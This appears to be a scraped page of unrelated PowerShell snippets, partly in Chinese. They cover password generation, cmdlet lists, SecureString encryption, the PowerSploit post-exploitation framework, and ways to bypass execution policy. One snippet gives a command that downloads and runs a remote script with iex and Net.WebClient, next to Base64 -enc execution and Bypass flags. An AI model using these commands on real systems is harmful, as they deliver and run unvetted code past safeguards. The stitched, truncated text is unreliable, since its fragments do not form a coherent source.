PowerShell Random Password Generator 文章 20/09/2016 On a project earlier this year, I had to create random passwords for user accounts as part of a provisioning tool. Perpetually trying to find the fastest way to do something, I came up with a one-liner that you can use to create a...
$cred = New-Object System.Management.Automation.PSCredential($username,$SecureString) $cred.GetNetworkCredential().Password 1. 2. 3. 4. 5. 6. Example: #---user A--- # 1.创建加密密钥 PS C:\WINDOWS\system32> Function RandomKey { >> $RKey = @() >> For ($i=1; $i -le 24; $...
Gets a random nu... Get-Unique Cmdlet Microsoft.PowerShell.U... Returns unique i... Group-Object Cmdlet Microsoft.PowerShell.U... Groups objects t... Import-Clixml Cmdlet Microsoft.PowerShell.U... Imports a CLIXML... Import-Csv Cmdlet Microsoft.PowerShell.U... Creates table-li... ...
預設檔案名為:PowerShell_transcript.<computername>.<random>.<timestamp>.txt。$VerbosePreference決定PowerShell 如何回應腳本、Cmdlet 或提供者所產生的詳細資訊訊息,例如 Write-Verbose Cmdlet 所產生的訊息。 詳細資訊訊息描述執行命令的動作。根據預設,不會顯示詳細資訊訊息,但您可以藉由變更 $VerbosePrefere...
Get-Random Get-Runspace Get-RunspaceDebug Get-SecureRandom Added in 7.4 Get-TraceSource Get-TypeData Get-UICulture Get-Unique Get-Uptime Get-Variable Get-Verb Moved from Microsoft.PowerShell.Core Group-Object Import-Alias Import-Clixml Import-Csv Import-LocalizedData Import-Power...
$key = 0..255 | Get-Random -Count 32 | %{[byte]$_} $pw | ConvertFrom-SecureString -Key $key You should store the key separately from the plaintext encrypted password. To read the string, use theConvertFrom-SecureStringkey: $encStr = Get-Content .\password.txt ...
ps1 Hello,Powershell Script PowerSploit PowerSploit是一款基于PowerShell的后渗透(Post-Exploition)框架软件,包含很多PowerShell攻击脚本,它们主要用于渗透中的信息侦查、权限提升、权限维持。其GitHub地址为:github.com/PowerShellMa 安装 我们把整个文件从GitHub上下载下来: ┌──(kali㉿kali)-[~/tools/windows]└...
Add-PowerShellContextMenuUtils\Add-PowerShellContextMenu.ps1Function to create context menu entries in order to invoke PowerShellLinkLink Add-ScriptHelpISEAddOnUtils\Add-ScriptHelpISEAddOn.ps1Function to create an ISE Add-On that will generate comment based help for functions. The functions requires ...
示例:powershell.exe -command “iex(New-Object Net.WebClient).DownloadString(‘http://[REMOVED]/myScript.ps1’)” 3、使用EncodedCommand参数执行单个Base64编码的命令。这将从执行策略排除命令。 示例:powershell.exe -enc [ENCODED COMMAND] 4、使用执行策略指令并传递“Bypass ”或“Unrestricted ”作为论据。
If the URL points to a repository, the script will automatically search all Powershell files in that repository and include them. Like "https://github.com/cfalta/PoshRandom" WebDownloadSimple Means a file that can be downloaded without authentication or stuff using an HTTP GET. Like "http:...